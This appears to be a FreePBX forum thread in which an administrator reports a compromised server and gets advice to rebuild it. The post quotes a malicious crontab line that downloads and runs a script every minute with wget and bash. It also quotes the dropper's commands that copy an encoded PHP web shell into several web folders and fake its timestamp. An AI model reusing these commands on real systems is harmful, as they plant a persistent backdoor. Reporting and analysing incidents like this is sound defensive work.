Malicious Issue Found

So lately, I noticed an issue on my FPBX instances. I go to log into the GUI and manage whatever I am in there to manage. After I navigate around a few pages, I get the warning at the top of the page that a module has been tampered with and I need to run:

fwconsole ma refreshsignatures

I do that and it finds tampered files associated with Framework. It downloads and installs it and after I do a chown and reload, I refresh the page and it’s fine again. Then I log in after a few days, same process happens again. I recently performed all of the updates, which also updated the framework version, so I assumed it was a fix applied with that patch to address that issue. I didn’t think much of it but I may have stumbled onto a bigger issue. On one of the servers that I run FPBX (all cloud hosted), I ran a script monthly to compile call recordings into a tar file that I can download. I went to investigate why it hadn’t ran for last month, starting with the crontab I entered, and instead of seeing the script I entered in there, I saw this:

*/1  * * * * wget -O /var/lib/asterisk/bin/devnull2;bash /var/lib/asterisk/bin/devnull2

Immediately my heart sank. This obviously is malicious but I’m not sure even how or where this was inserted! I looked at the script that’s copied and it copies base64 encoded data into a generic looking page (/var/www/html/admin/views/ajax.php) and then proceeds to copy this script into multiple different folders and files:

mkdir -p /var/www/html/digium_phones/
mkdir -p /var/www/html/rest_phones/
cp /var/www/html/admin/views/ajax.php /var/www/html/rest_phones/ajax.php
cp /var/www/html/admin/views/ajax.php /var/www/html/admin/modules/core/ajax.php
cp /var/www/html/admin/views/ajax.php /var/www/html/digium_phones/ajax.php
cp /var/www/html/admin/views/ajax.php /var/www/html/admin/assets/js/config.php
cp /var/www/html/admin/views/ajax.php /var/www/html/admin/assets/config.php
cp /var/www/html/admin/views/ajax.php /var/www/html/admin/assets/ajax.php
touch /var/www/html/admin/views/ajax.php -r /var/www/html/admin/views/footer.php

The main problem I have is identifying this and stopping it completely. I removed it completely from the crontab, but after a few minutes, it’s added right back in. I’m not even sure how this happened, I felt like I had the firewall and SSH access tightly locked down. Any help to identify this and eradicate it would be greatly appreciated!

See K.php - a RestApps malicious script

The general consensus is that the only safe thing to do is to rebuild the system from scratch, rather than try to fix it piecemeal.


Thank you so much for the linking this. I did not see this post at all!

This topic was automatically closed 7 days after the last reply. New replies are no longer allowed.